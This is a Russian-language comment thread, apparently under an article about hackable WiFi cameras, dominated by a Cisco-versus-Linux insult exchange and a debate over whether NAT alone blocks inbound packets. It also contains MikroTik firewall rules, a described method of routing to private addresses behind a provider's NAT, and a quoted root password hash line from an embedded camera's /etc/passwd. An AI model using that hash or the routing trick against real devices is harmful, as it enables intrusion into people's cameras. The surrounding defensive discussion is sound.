                                                                                              Ребята, вы — анукеи. Продвинутые, но все равно анукеи. И чтоб вам стать инженерами — вам надо долго и нудно учиться. И начинать с азов, типа того что такое маршрутизация и зачем она нужна. И самое главное — забыть все что вы усвоили «о сетях» из линакса как страшный сон. Изучать сети по линаксу, это все равно что начать изучать программирование с бейсика.


                                                                                              1. qw1
                                                                                                18.03.2017 09:46
                                                                                                +1

                                                                                                И эти люди реализуют сетевую подсистему линакса
                                                                                                Не вы ли писали, что cisco — это сеть, как они сделают, так и будет стандартом. И пофиг на RFC.

                                                                                                У линукса тоже есть вес. Как они сделали, циске придётся учитывать и прогибаться.

                                                                                                Иначе, если они со своим видением сделают несовместимо (и даже напишут RFC, вы уже показали, что они могут), новые железки никто не купит. А если купит по ошибке, и за циской линуксы работать не будут, циске задолбают техподдерку и она впилит костыли для поддержки линуксов, бу-га-га.

                                                                                                Ребята, вы — анукеи
                                                                                                Посмотрите, где вы пишете. Тут вопрос про закрытие WiFi-камер. Сколько нужно сертифицированных инженеров циски, чтобы обезопасить одну WiFi-камеру?

                                                                                                Этот ваш наезд похож на то, как если бы в обсуждение строительства дачных домиков ворвался строитель БАМа и рассказывал всем, какие тут дебилы собрались, копают котлован неправильно. Ведь, по его мнению, единственный расово верный — это карьерный экскаватор с пятиметровым ковшом. Остальные полумеры для дилетантов.


                                                                                                1. lrsi
                                                                                                  18.03.2017 13:44
                                                                                                  -1

                                                                                                  Не вы ли писали, что cisco — это сеть, как они сделают, так и будет стандартом. И пофиг на RFC.

                                                                                                  Я тут в соседнем посте показал кто пишет RFC — Cisco, Juniper, Lucent… И прочие серьезные производители сетевого оборудования. А не линаксоиды.
                                                                                                  Так что по факту для тебя Cisco это и есть RFC. :)
                                                                                                  А если купит по ошибке, и за циской линуксы работать не будут, циске задолбают техподдерку и она впилит костыли для поддержки линуксов, бу-га-га.

                                                                                                  Нет, это вы напишете патчик, чтоб соотвествовать стандартам, определеными Cisco. Прецеденты уже были. :)
                                                                                                  Посмотрите, где вы пишете. Тут вопрос про закрытие WiFi-камер. Сколько нужно сертифицированных инженеров циски, чтобы обезопасить одну WiFi-камеру?

                                                                                                  В грамотно сконфигурированной сети эти уязвимости — не работают. :) И остаются чистой теорией.


                                                                                                  1. qw1
                                                                                                    18.03.2017 16:15
                                                                                                    +1

                                                                                                    Теперь я знаю всё про снобизм и непробиваемую самоуверенность циско-«инженеров».


                                                                                                    1. lrsi
                                                                                                      18.03.2017 17:54
                                                                                                      -1

                                                                                                      Нет, это просты ты не знаешь базовых вещей о сетях — не можешь даже дать правильного определения таких базовых понятий как маршрутизация.


                                                                                                      1. qw1
                                                                                                        18.03.2017 18:18
                                                                                                        +1

                                                                                                        Звучит так, как будто у меня не хватает квалификации заценить всю глубину снобизма и самоуверенности ))


                                                                                                        1. lrsi
                                                                                                          18.03.2017 19:12
                                                                                                          -2

                                                                                                          Снобизм — это у вас, у линаксоидов. Выучили десяток трудно запоминающихся команд, изучили потроха малораспространенной и невостребованной системы с хреновой, а посему — кране запутаной и нелогичной архитектурой — и думаете что вы разбираетесь в ИТ. Вы заблуждаетесь.


                                                                                                          1. J_o_k_e_R
                                                                                                            18.03.2017 23:58
                                                                                                            +1

                                                                                                            Простите, что влезаю, хоть и обещал так не делать, но я тут вспомнил, что есть же еще BSD системы, в которых NAT и firewall строятся по принципу ближе к линуксу, чем к cisco. Как Великий Мастер Cisco к ним (*BSD) относится? Или они тоже говно и недостойны?


                                                                                                            1. lrsi
                                                                                                              19.03.2017 00:11
                                                                                                              -1

                                                                                                              Это ты обратись к Juniper — им таки удалось сделать из фряхи нечто пристойное… Правда ценник там совсем конский, по сравнению с ними кошечки очень недорогие…
                                                                                                              Правда есть одно но — если линакс или бсдя используется в какой-то приличной сетевой железке, то наблюдается смешной момент — от их сетевой подсистемы не остается и камня на камне, фактически она реализуется с нуля, а линакс или фряха фактически используются как простейший бутлоадер и набор дров. :)


                                                                                                              1. J_o_k_e_R
                                                                                                                19.03.2017 00:17

                                                                                                                Большое спасибо за ответ. И еще один вопрос, логично вытекающий из Вашего комментария. Вы чем именно упарываетесь и где берёте? Вы порошком из мелкоперетёртых цисок шприцом прямо в висок бахаетсь или пока еще в дёсны втираете?


                                                                                                                1. lrsi
                                                                                                                  19.03.2017 01:13
                                                                                                                  -2

                                                                                                                  Да пожалуйста. Я ничем не упарываюсь, но зато знаю чем упарываетесь вы — пингвинячим д-м. :) Забористая штука… Но зато я знаю чем вы кончите, если не получите базовых, которые позволят вам двигаться дальше, а не сидеть в жестком вендор-локе — на линаксе. Я с годик назад парочку таких увольнял — в 90-х мужики были неплохими спецами, но… они застряли в 90-х. Потом попали в госконтору, потом госконтору поделили, скинули весь в балласт в приватизируемую часть… Ну и нас пригласили — чтоб удержать все это хозяйство на плаву, до продажи… И слегка поразогнать балласт :)
                                                                                                                  Запомнились два товарища, оба 50+. Оба — прекрасные специалисты… были… в 90-х. Но получением базовых знаний — не озаботились. Так что покладистый дорабатывает до пенсии кладовщиком, хоть и на складе ИТ, а гоношистый, типа тебя — вылетел по статье.
                                                                                                                  Это и твоя судьба линаксоид. Хотя ты мне разумеется сейчас не веришь. Но вспомнишь об этом посте, когда время придет. :)


                                                                                                                  1. J_o_k_e_R
                                                                                                                    19.03.2017 01:28
                                                                                                                    +1

                                                                                                                    Избавила судьба мужиков от идиота-начальника. Молодцы мужики, уважаю. Вот Вы с такой квалификацией через чью постель в руководители пробились? Или классические голые понты школьника, живущего с мамой? У взрослого, серьезного человека не будет пригорать настолько, что он тред будет в личный блог выносить. В котором его же еще раз успешно в помои его «квалификацией» и окунули.


                                                                                                                    1. lrsi
                                                                                                                      19.03.2017 02:21
                                                                                                                      -1

                                                                                                                      Мальчик, мне тоже около 50-ти, внезапно да? И собственно яб оставался обычным ведущим инженером, старшим системным администратором и т.д., вообщем — на чисто инженерной должности, но… есть проблема — людей моего возраста и моего уровня квалификации считается стремным брать на такие должности, чисто инженерные, типа могут быть проблемы с более молодым начальником из-за его возраста и меньшей компетентности оного. Посему от начальственных лычек отвертеться не получается…
                                                                                                                      Если ты думаешь что увлечение дохода компенсирует гиморой от этих лычек, то ты дико заблуждаешься.


                                                                                                                      1. J_o_k_e_R
                                                                                                                        19.03.2017 02:31
                                                                                                                        +1

                                                                                                                        Мужик 50 лет спорит с «мальчиками» в интернетиках? Забанен на всех технических сайтах рунета, общаясь так как у меня гопники синюшные у подъезда не общаются? (иллюзию компетентности и отсутствие банальной грамотности я уже даже не беру в расчёт)
                                                                                                                        «Дядя», кого Вы лечите? Вам от силы лет 20, мало мозгов и куча свободного времени на срачи в интернете, так как мама с папой кормят и деньги зарабатывают.


                                                                                                                        1. lrsi
                                                                                                                          19.03.2017 03:23
                                                                                                                          -2

                                                                                                                          Ну вот ты и поплыл. Удачи. Вспомнишь мои слова — никуда не денешься, не долго ждать осталось. Тебе если верить профилю — 34 года, а следовательно — ты уже врятли сможешь получить необходимые базовые знания. Еще лет 10-15 — и у тебя начнутся серьезные проблемы, знания которыми ты владеешь окончательно устареют, а обновлять ты их уже не сможешь — из-за отсутствия теоретических знаний. Изучай складское дело и специальность менеджера по продажам. :)
                                                                                                                          Мозгов у тебя как я погляжу не хватает даже на то чтоб выяснить кто я такой. А это — не сложно, я не шифруюсь… так небольшая защитка от уж совсем идиотов. Если есть мозги — позвони, поговорим. :)

                                                                                                                          P.S. Приколно, ты родился в тот год, когда я впервые сел за комп. Это была ЕС1022. :)


                                                                                                                          1. J_o_k_e_R
                                                                                                                            19.03.2017 03:29
                                                                                                                            +1

                                                                                                                            Серьезно? Я не верил, но Вы реально выжидаете кулдаун возможности писать коммент почти с точностью до минуты просто, чтоб уязвить меня? В половину четвертого ночи. Серьезно? 50 лет? Скажите, это же всё-таки наркотики? Алкоголь? Радиация хотя бы? Не может же взрослый мужик просто так остаться по уровню развития на уровне школоты в плохом смысле этого слова.


                                                                                                                            1. lrsi
                                                                                                                              19.03.2017 14:25

                                                                                                                              Вы реально выжидаете кулдаун возможности писать коммент почти с точностью до минуты просто, чтоб уязвить меня?

                                                                                                                              Скрипт дебил. Я его написал — он его отправит.


                                                                                                                          1. J_o_k_e_R
                                                                                                                            19.03.2017 03:46
                                                                                                                            +1

                                                                                                                            И да. Насчет профиля. Все врут. Вы врёте, что понимаете что-то в сетях и что какой-то там начальник. Я вру про свои данные в профиле (мне на самом деле 22 (с половиной)).
                                                                                                                            А зачем мне Вам звонить? Работу ищете? Так мне не нужны кладовщики, спасибо. У нас уже есть один. Отличный дядька. Любил всем навязывать циски на каждом углу… пока не разорился. Теперь отличный кладовщик. Как раз циски снятые с использования за ненужностью охраняет.


                                                                                                                  1. qw1
                                                                                                                    19.03.2017 11:23

                                                                                                                    сидеть в жестком вендор-локе — на линаксе
                                                                                                                    Кстати, если уж придираться к терминам, то кто вендор?

                                                                                                                    Но получением базовых знаний — не озаботились
                                                                                                                    Знание linux — необходимо для современного цискаря. У нас давно внедрены cisco CMX location & presence analytics для слежки за сотрудниками. Угадайте, что там под капотом? Centos + PostgreSQL. Если цискарь не сможет их поставить, настроить и обслуживать, то он пойдёт искать другую работу.


                                                                                                                    1. lrsi
                                                                                                                      19.03.2017 15:32

                                                                                                                      Кстати, если уж придираться к терминам, то кто вендор?

                                                                                                                      Формально — сообщество, по факту — ibm
                                                                                                                      Знание linux — необходимо для современного цискаря.

                                                                                                                      Вы так говорите, как будто это что-то сложное — знать линакс :) Для меня — это просто еще одна ОС, один из многих юниксов, с которыми мне приходилось работать.
                                                                                                                      Имея тот самый набор базовых знаний, о котором я вам постоянно говорю — разобраться с любым линаксом не проблема. Правда наличие этого самого набора гарантирует нелюбовь к линаксу. :)
                                                                                                                      Ну и вдогонку — даже если не знает, то не уволят. Если действительно нужно — наймут какого-нибуть линаксода, это всего примерно 1/3 от зарплаты цискаря… :)
                                                                                                                      cisco CMX location & presence analytics

                                                                                                                      Не работал с этим продуктом. Но по опыту работы с другими подобными продуктами кошководов — могу предположить что знание линакса как такового там не требуется — все делается через веб-морду скорей всего. Или — через свой командный язык, exec-like.
                                                                                                                      Вы бы лучше привели в пример snort или netflow — тут действительно приходится сталкиваться с линаксом. Хотя и не обязательно, но иногда под ним — удобней.


                                                                                                    1. J_o_k_e_R
                                                                                                      18.03.2017 18:37
                                                                                                      +1

                                                                                                      Не надо смешивать одного неадеквата и всех инженеров только. (Да, я увидел кавычки). Ваш оппонент скорее «морская свинка»: ни к морю, ни к свиньям отношения не имеет.

                                                                                                      Это даже скорее редкость. Я на курсах сетевиков встречал инженеров с сертификатами cisco (совершенно разного уровня). Вполне нормальные люди, которые в том числе понимают, что на одном вендоре не зиждется интернет и пришли послушать как сети в остальном большом мире устроены.

                                                                                                      Я искренне советую не обращать на него внимания, не отвечать на его посты. Ничему полезному он Вас не научит, даже если вы про циско что-то спросите.


                                                                                                    1. J_o_k_e_R
                                                                                                      18.03.2017 19:27

                                                                                                      Кстати, этот кадр, оказывается с давних времен и других ресурсов известен (3 абзац комментария) как крайне нездоровый фанатик.


                            1. AmberSP
                              13.03.2017 10:25
                              +1

                              >Редкая вырожденная ситуация, которую вероятно можно встретить в каких-нибудь студенческих общежитиях с самопальной сетью.

                              И у многих крупных провайдеров, которые на дают роутеру клиента внешний адрес, а прячут его за NAT. Не проверял, но уверен, что роутеры всех моих соседей находятся в одной подсети с моим.


                            1. J_o_k_e_R
                              13.03.2017 13:29

                              да, можно попытаться прописать gateway. Редкая вырожденная ситуация, которую вероятно можно встретить в каких-нибудь студенческих общежитиях с самопальной сетью.


                              Ну то есть еще раз. NAT ничего без фаервола не блокирует. Блокирует либо отсутствие маршрутизации, либо фаерволл.

                              Крупный провайдер крупного российского города. Дает ипы из сети /21. Торренты качаются через сеть провайдера, как раз через внутреннюю сеть этого провайдера.
                              И такой провайдер не один по РФ. Практически все, кто не использует туннелирование типа l2tp или pppoe. Это же не мультикаст\броадкаст, который изолируют по vlan'ам.


                              1. lrsi
                                15.03.2017 21:08
                                -1

                                NAT ничего без фаервола не блокирует.

                                Бред линаксоида. Нет трансляции — нет пакета. То есть по умолчанию, если запрещено автоматическое создание трансляций, NAT блокирует абсолютно все. :)


                          1. qw1
                            13.03.2017 20:28
                            +1

                            У злоумышленика один интерфейс с адресом 7.7.7.200/24. обращается на 192.168.0.2. Будьте любезны разжевать, что именно воспрепятствует нашему роутеру заблокировать пакеты межу 7.7.7.200 и 192.168.0.2?
                            Интересная теория…

                            Допустим, злоумышленник посылает SYN с 7.7.7.200:21001 на 192.168.0.2:80. Сервер там отвечает SYN-ACK на 7.7.7.200:21001.

                            Но обратный пакет перехватывается роутером и отбрасывается NAT-ом, т.к. маппинга нет в таблице трансляции. Новые трансляции должны создаваться пакетом SYN, но не SYN-ACK (NAT-ы следят за фазами TCP-соединения, чтобы вовремя очищать записи в таблице трансляции, так можно держать больше соединений. Да и всякий мусор отбрасывать — благое дело).

                            Допустим, у нас кривой NAT и ему пофиг, что SYN, что SYN-ACK.
                            В этом случае ответ будет отправлен с другого IP (7.7.7.100) и другого порта.
                            Порт нужно менять, т.к. если два клиента, 192.168.0.1 и 192.168.0.2 отправят запрос на сервер 7.7.7.200:80 по случайности с одного порта 22001, сервер не различит эти соединения.
                            В этом примере NAT принудительно заменит порт и сервер будет видеть 192.168.0.1:21001 как 7.7.7.100:31001, а 192.168.0.2:21001 как 7.7.7.100:31002.

                            Так и при трансляции SYN-ACK будет подменён и адрес, и порт, и TCP-соединение развалится.


                            1. J_o_k_e_R
                              13.03.2017 20:39

                              В этом случае ответ будет отправлен с другого IP (7.7.7.100) и другого порта.
                              Порт нужно менять, т.к. если два клиента, 192.168.0.1 и 192.168.0.2 отправят запрос на сервер 7.7.7.200:80 по случайности с одного порта 22001, сервер не различит эти соединения.
                              Значит, NAT принудительно заменит порт и сервер будет видеть 192.168.0.1:21001 как 7.7.7.100:31001, а 192.168.0.2:21001 как 7.7.7.100:31002.


                              Вы вот тут спутали понятия сервер и адреса. Или я Вас совсем не понял. У нас сервер — 192.168.0.2. Злоумышленник — 7.7.7.200. Перепроверьте, пожалуйста, что адресацию в цитируемом абзаце. Я пока сэмулирую предложенную схему на виртуалках и покажу лог сниффера.


                              1. qw1
                                13.03.2017 20:44
                                +1

                                Это иллюстрация факта, что NAT подменяет не только ip-адреса клиентов (192.168.0.2 на 7.7.7.100), но и порты (на любые свободные)


                              1. qw1
                                13.03.2017 20:50
                                +1

                                Я пока сэмулирую предложенную схему на виртуалках
                                Лучше объясните, почему ответ сервера 192.168.0.2, который проходит через LAN-интерфейс роутера 192.168.0.254, не попадёт в NAT.


                                1. J_o_k_e_R
                                  13.03.2017 20:53

                                  А почему он должен не попасть? Кстати, я сэмулировал свою схему для SSH специально для вас. Все работает. Сейчас почищу и выложу дамп. Использовал микротики, но в них routeros, сиречь модифицированный линукс, так что работать будет на всех линуксах (openwrt, asuswrt и т.п.)


                                  1. qw1
                                    13.03.2017 21:00
                                    +1

                                    А почему он должен не попасть?
                                    Так в том и проблема, что если попадёт, то должен дропнуться NAT-ом, а если не дропнется, то у ответа должен быть подменён SRC-ADDR, SRC-PORT и клиент на 7.7.7.200 не поймет, как так — отправлял на 192.168.0.2:80, а отвечает 7.7.7.100:31001. Это явно ответ не к тому запросу.


                                    1. J_o_k_e_R
                                      13.03.2017 21:55

                                      Покопавшись в дампе wireshark'ом пришел к выводу, что ответные пакеты и, как следствие все пакеты соединения по src nat не попадают. Почему? У меня сходу нет ответа. Но это так как минимум в линуксах и routeros. Если хотите — покажу дампы, напишите только контакт в ЛС. Публично их выкладывать смысла не вижу, там тихо мирно ходят пакеты между 7.7.7.200 и 192.168.0.2, тогда как src nat на WAN прописан и, если например, с 192.168.0.2 обратиться на 7.7.7.200, то пакеты приходят с 7.7.7.100.


                                      1. qw1
                                        13.03.2017 23:32

                                        В дампах нет смысла, если это обычные TCP-соединения.

                                        Поспрашиваю у знакомых сетевиков, как настроить firewall против этого случая.

                                        Наивный подход

                                        /ip firewall filter
                                        add action=drop chain=forward comment="disallow provider access to my network" dst-address=192.168.0.0/16 in-interface=PPPoE-domRU
                                        не работает — блокируется и легитимный трафик, прошедший NAT


                                        1. J_o_k_e_R
                                          13.03.2017 23:38
                                          +1

                                          Да как настроить фаервол я знаю, это в последних версиях routeros из коробки:

                                          add action=accept chain=input comment=«defconf: accept establieshed,related» connection-state=established,related
                                          add action=drop chain=forward comment=«defconf: drop all from WAN not DSTNATed» connection-nat-state=!dstnat connection-state=new disabled=yes in-interface=5-lte

                                          Спорил я с невеждами выше о том, что нужен ли вообще фаервол, когда есть NAT. Он, очевидно, нужен.

                                          Вопрос, который Вы у меня зародили, в том «почему оно так?» На основании чего linux\routeros не srcnat'ит SYN+ACK. Я раньше об этом как-то не задумывался, принимал как должное. Сейчас потратил вечер на чтение RFC и гугленье, но ответа пока не нашел.


                                          1. qw1
                                            14.03.2017 00:16

                                            Я начал гуглить всякие конфиги, и там рекомендуют блочить входящие

                                            connection-state=invalid,new

                                            И вот этот 'invalid' навёл на мысль, что раз уж у каждого пакета есть такой признак, то он используется для попадания в NAT.

                                            Пакеты new идут в NAT для создания маппинга, а established — для трансляции.

                                            SYN-ACK — invalid, в NAT не попадает, поэтому идёт в роутинг.

                                            PS. Ниже так уже написали )))


                                            1. J_o_k_e_R
                                              14.03.2017 00:27

                                              И вот этот 'invalid' навёл на мысль, что раз уж у каждого пакета есть такой признак, то он используется для попадания в NAT.


                                              Как это у каждого? Правило, которое Вы привели обозначает блочить пакеты с ctstate invalid ИЛИ new. Там же речь про цепочку FORWARD же?

                                              Пакеты new идут в NAT для создания маппинга, а established — для трансляции.

                                              SYN-ACK — invalid, в NAT не попадает, поэтому идёт в роутинг.


                                              SYN-ACK в нашем случае уже established. Поэтому он идет через то же правило NAT, что и первый пакет с NEW — то есть не NATится совсем.


                                              1. qw1
                                                14.03.2017 07:31

                                                Как это у каждого?
                                                То есть, connection-state уже посчитан для каждого пакета, чего бы не использовать для определения, отправлять ли в NAT
                                                Правило, которое Вы привели обозначает блочить пакеты с ctstate invalid ИЛИ new. Там же речь про цепочку FORWARD же?
                                                Да, forward. Сделал аналогично для ipv6, а то без этого сеть защищена было только рандомизацией.
                                                SYN-ACK в нашем случае уже established
                                                Это я ошибся.


                                        1. ValdikSS
                                          14.03.2017 00:03
                                          +1

                                          Поспрашиваю у знакомых сетевиков, как настроить firewall против этого случая.
                                          Разрешать маршрутизирование пакетов только от уже установленных и вспомогательных соединений (conntrack RELATED, ESTABLISHED, на Mikrotik должно такое быть) из интернет-интерфейса в LAN-интерфейс.


                            1. J_o_k_e_R
                              13.03.2017 23:59
                              +2

                              Разобрались вместе с ValdikSS. Спасибо ему большое.

                              Во-1, я нашел подтверждение в официальной документации netfilter:

                              3.2.2. NAT



                              This table is slightly different from the `filter' table, in that only
                              the first packet of a new connection will traverse the table: the
                              result of this traversal is then applied to all future packets in the
                              same connection.


                              Во-2, https://upload.wikimedia.org/wikipedia/commons/3/37/Netfilter-packet-flow.svg (приписка про NEW)

                              Ну и краткое описание изысканий для интересующихся:
                              ?[23:45:17] ?ValdikSS?: SYN от «хакера» в «лан» приходит с внутренним состоянием CONNTRACK «NEW» и не попадает в POSTROUTING, что логично. Когда клиент хочет ответить на этот SYN, это соединение уже имеет состояние «SYN_RECV», и не попадает в цепочку NAT POSTROUTING.
                              qw1 так-то правильно говорит про сферический NAT в вакууме, думаю, такие, как он говорит, тоже встречаются, просто линуксовый conntrack чуть продвинутей и умней.
                              [23:48:24] ?ValdikSS?:
                              » Вот ты это откуда все взял?
                              Сделал 2 контейнера: «hacker» и «lan», на hacker сделал INPUT -j DROP, на lan сделал nc -l -p 4444 и логирование пакетов iptables в -t nat POSTROUTING, подключился с hacker на lan, посмотрел состояние conntrack, увидел syn-sent, увидел, что пакет не попадает в POSTROUTING, посмотрел на эту таблицу, на которую я тебе дал ссылку (она у меня на стене в распечатанном виде), увидел заметку про NEW.
                              [23:50:10] ?ValdikSS?: Раньше в линуксе был NAT еще и в iproute2, вот он тупой, он на уровне пакетов работал, и с ним бы вышло так, как говорит qw1. Но это не означает, что это безопасно: пакеты в принципе передаются и принимаются, достаточно только воспользоваться модифицированным TCP-стеком каким-нибудь, чтобы с таким «асимметричными маршрутами» устанавливать TCP-сессии.
                              ?[23:51:38] ?ValdikSS?: Предполагаю, что как раз всякие Cisco работают так, как qw1 пишет.
                              ?[23:51:58] ?ValdikSS?: (и порты не обязательно должны всегда меняться, зависит от реализации, но это не принципиально).


                    1. J_o_k_e_R
                      12.03.2017 23:04

                      Более того, в предложенном мною варианте это никак не поможет. Пакеты на WAN интерфейс буду приходит с подсети WAN-интерфейса, как я и указал во втором абзаце предыдущего комментария.


    1. VitalKoshalew
      15.03.2017 12:48
      +2

      А как вы собираетесь эти камеры находить, если провайдеры раздают по /56 каждому клиенту?

      Не говоря уже о том, что если вы хотите пожертвовать P2P-соединениями в целях некоторой безопасности, как в случае с NAT, нет проблемы сделать простое правило «разрешить исходящие, запретить новые входящие сессии» на «домашнем» маршрутизаторе IPv6, NAT для этого не нужен.


  1. Psychosynthesis
    12.03.2017 06:42

    root:$1$ybdHbPDn$ii9aEIFNiolBbM9QxW9mr0:0:0::/root:/bin/sh

    Вот с этим, кстати, не очень понятно что делать… Что из этой строки есть хэш?

    $1$ybdHbPDn$ii9aEIFNiolBbM9QxW9mr0 — в базах хэшей не ищется, некоторые пишут что тип хэша неверный.


    1. Lertmind
      12.03.2017 14:08

      Здесь используется алгоритм, основанный на MD5. Структура «зашифрованного» пароля, полученная от crypt (C):
      $id$salt$hashed, где id — используемый алгоритм, salt — Base64-соль, hashed — Base64-результат от хеширования пароля и соли. Подробнее по ссылке выше.


      1. Psychosynthesis
        12.03.2017 15:59

        Круто, спасибо!


  1. AleXP3
    12.03.2017 09:30

    Logitech HD Pro Webcam C920 даже вошла в список. Довольно популярная брендовая камера.


    1. xsash
      12.03.2017 20:15

      только я не совсем понял почему, она же USB, неужели дрова открывают порты?


      1. AleXP3
        12.03.2017 20:47

        Похоже, что да:

        С сайта Logitech:

        Поддержка режима для видеоустройств USB-класса (UVC):
        — Mac OS 10.6 или более поздней версии (видеовызовы в формате HD 720p по FaceTime для Mac или в других поддерживаемых приложениях для видеосвязи; видеозапись в формате Full HD 1080p с помощью проигрывателя QuickTime Player)
        — Chrome OS™
        — Android™ 5.0 или более поздней версии (с поддержкой приложений для видеосвязи)
        — USB-порт
        Подключение к Интернету



    1. nyakman
      15.03.2017 12:48

      Но ведь это же просто web'ка. Она не работает без ПК, и Wi-Fi в ней тоже нет. Не понятно что она делает в этом списке.


    1. Ahen
      15.03.2017 12:48

      Но… У неё же нет вайфай. Пойду заклею её изолентой, что-ли.
      Модель действительно распространенная, по цена/качество выигрывает многие другие модели.


  1. Dmitry_Dor
    12.03.2017 09:38

    1. servermen
      12.03.2017 09:55

      А не проще ли ему было просто заказать себе аппарат сразу без камеры и микрофона, или же привлечь специалиста, что бы он отключил их на физическом уровне?


      1. petro_64
        12.03.2017 10:14
        -1

        Наверное потому что если вдруг понадобится — можно будет отклеить и сразу пользоваться. Правда, с таким же успехом можно тумблер поставить )


      1. AleXP3
        12.03.2017 10:22

        Это лишние траты! Изолента на камере бесплатна и не хуже функциональна.


        1. webserfer
          12.03.2017 12:17
          -1

          Клей на камере остается. Шторка намного лучше.


        1. dredd_krd
          12.03.2017 12:59

          А с микрофоном что делать? Звук через изоленту прекрасно просачивается, проверял


          1. AleXP3
            12.03.2017 13:08

            Тут ничего не поделать. Только молчать остается )


            1. ARD8S
              12.03.2017 17:23

              Можно ещё иногда разговаривать с воображаемым другом на «другом конце провода». Вдруг ответят?


        1. arandr
          15.03.2017 12:48

          Хм. Я вот взял изоленту, заклеил у себя микрофон (asus) и проверил запись звука — изолента нисколько не помешала записи, стало чуть-чуть глуше, только и всего.


      1. YMA
        12.03.2017 10:29
        +4

        Предполагаю, что аппарат, делающийся под заказ для Марка Цукерберга — просто лопнул бы от закладок, которые потребовали бы туда установить всякие разные службы. Привлечь специалиста — аналогично, нет 100% доверия, что ему не заплатят за установку дополнительных закладок…

        Самое надежное — купить аппарат в первом попавшемся магазине подальше от офиса — по крайней мере, закладки будут только стандартные.


        1. Qu3st
          12.03.2017 17:01

          А зачем самому светится? Через доверенного человека заказать можно. Со специалистом — аналогично. Да и зачем специалист вообще нужен? Сам разобрал, да отключил, а то полумеры какие то...)


      1. jodaka
        12.03.2017 10:31
        +3

        Да, разумеется, предложенные вами варианты сильно проще пары кусочков скотча.


        1. romxx
          12.03.2017 22:46

          «Зачем просто, когда можно сложно?» ;)


      1. savagebk
        15.03.2017 12:48

        Возможно, он их иногда использует


  1. ntfs1984
    12.03.2017 15:47
    +1

    Китайцы мало того что не думают о защите, а напротив вставляют в свои камеры бекдоры. Я свои камеры с умного дома застремался наружу выпускать. Подключены к серверу с Linux/motion, тот конвертирует rtsp в mjpeg, и уже отдает.

    Меня стремает не взлом, и даже не то что китайцы узнают какие позы с женой мы пробуем, а то что у камеры появится +1 шанс быть отключенной китайцем извне в тот момент когда меня не будет дома, и когда ко мне будут лезть воры.

    Так что...iptables наше все :)


    1. hostadmin
      12.03.2017 20:25
      +1

      Камера в спальне? Месье знает толк в наслаждениях!


      1. ntfs1984
        13.03.2017 01:28

        Камера во двор. Она еще используется и как своеобразный ключ от двери: берем мячик определенного цвета, встаем в определенное место, и вуаля. На тот случай, если ключи утеряются.

        А вот уже во дворе… можно не только с женой :)


      1. swarggg
        13.03.2017 02:14

        все самые интересные позы получаются, как раз, вне спальни ))


    1. kernelconf
      15.03.2017 12:49

      Самое смешное было, когда я написал китайцам с просьбой предоставить пароль от неотключаемого telnet. Ответили что конечному пользователю (sic!) туда нельзя.

      В итоге, камеры живут в отдельной подсети, исходящие инициировать не могут, разрешён входящий 554 и 80.


  1. Navij
    12.03.2017 20:35

    А можно где-нибудь найти список более-менее устойчивых к взлому моделей? А то задумался о покупке такой камеры, но что-то стрёмно как-то, учитывая количество разоблачительных статей подобного характера за последние несколько лет.


    1. AleXP3
      12.03.2017 21:26

      Даже если бы такой список был — это ничего не значит, так как на следующий же день в выпускаемых камерах производитель сделает апгрейд внутреннего софта, включив в неё какую-нибудь популярную либу с дырками, и список тут же потеряет свою актуальность.

      Защищаться от взлома надо контролем интерфейса камеры: ограничением адресов и портов обращения к ней извне, MAC-адресов и т.п.


    1. ntfs1984
      13.03.2017 01:37

      Вам нужно искать не камеру устойчивую ко взлому, а камеру пригодную для кастомизации. В моей китайской внутри Linux, bash, squashfs все дела. И какой-то непонятный бинарь /bin/Sofia. Думаю при наличии прямых рук, холодной головы и времени, этот Linux можно оттуда турнуть, и поставить туда что-то вроде OpenWRT.
      Единственное что меня останавливает — это неизвестный мне пока способ подключения CCD к плате. Ну вот если например вы подключаете вебку к компу — там появляется UVC интерфейс /dev/video0, и вы можете скормить это любой программе. 30 баксов конечно для FullHD-камеры не деньги, но окирпичить их мне пока не охота.


      1. roboter
        13.03.2017 12:26
        -1

        тогда лучше взять роутер с openWRT и воткнуть в него USB камеру.


        1. ntfs1984
          13.03.2017 13:54
          +1

          Нет не лучше. Кроме USB-камеры, в него еще придется воткнуть управляемую ИК-подсветку и автофокус, а потом все это воткнуть в влагозащищенный корпус с соответствующим креплением.
          Затянет это все намного больше 30-ти долларов, будет занимать больше места, и даст угол обзора меньший, чем дает IP-камера.


          1. roboter
            13.03.2017 16:36
            -1

            Не вижу откуда вы взяли взаимосвязь между интерйфесом IP/USB и наличием/отсутствием фокуса, подсветки и корпуса.


          1. roboter
            13.03.2017 16:42
            -1

            подсказка, гуглить «usb camera outdoor»


            1. ntfs1984
              13.03.2017 19:21
              +1

              А. Теоретик значится.

              Ну окей. Тогда зашлите мне пожалуйста линки на usb camera outdoor с разрешением видео 1920х1080, на роутер, а так же на 10-метровый USB-кабель, либо иную реализацию того, что позволит закрепить эту камеру под крышей двухэтажного дома.

              Разумеется в этой USB-камере должен быть автофокус и ИК-подсветка, которая будет освещать расстояние до 40-ка метров, и которая будет регулироваться настройками с ПК\роутера. Стоить она должна разумеется меньше 30 долларов.
              В моих магазинах на юге Украины, таких веб-камер НЕТ.

              Сэр, я конечно любитель DIY, но исходя и из конечной цены, и из удобства строения\использования, ваш вариант — эталонный велосипед на костылях.


      1. J_o_k_e_R
        13.03.2017 20:21

        Простите, если смысл использовать IP-камеру перед USB я понимаю и полностью с Вами согласен, то зачем «тюнинговать» камеру в целях безопасности, когда можно за 25 баксов купить роутер, которым прикрыть до трех камер, отфилтровав только тот траф, что нужно и можно?


        1. ntfs1984
          14.03.2017 11:07

          Потому что тюнинг касается не только безопасности. Моя IP-камера например, имеет три фатальных на мой взгляд недостатка: a) Управлялка через плагин ActiveX; b) Отсутствие MJPEG, из-за чего мне приходится держать промежуточный сервер с /bin/motion; c) Кое-какие нюансы с ИК подсветкой которые мне хотелось бы исправить.

          Помимо этого, на камере имеется работающий USB, благодаря которому туда можно вставить WiFi свисток, или флешку. На данный момент, у меня в доме USB-из сервака подключено в одну из розеток RJ45, и во второй секретной розетке стоит флешечка. Ну чтобы потенциальные воры не унесли видеозапись с собой. И если вдруг удастся поместить флешку внутри камеры — будет вообще чотко.

          Вообще касательно безопасности, у меня паранойя не столь к внешнему управлению камерой (камеры у меня в отдельной подсети для умного дома, к внешке доступа нет), сколь к этой /bin/Sofia. Я не знаю штоэта, не знаю может там есть какая-то дополнительная логика, ну типа «отключать видеонаблюдение как только появится салатовый цвет», или что-то вроде этого.


  1. teleghost
    13.03.2017 01:17

    Почти все прошивки массово-потребительских устройств такого же отвратительного качества и никем не обновляются, просто веб-камеры в штуках, наверное, самые массовые после смартфонов.

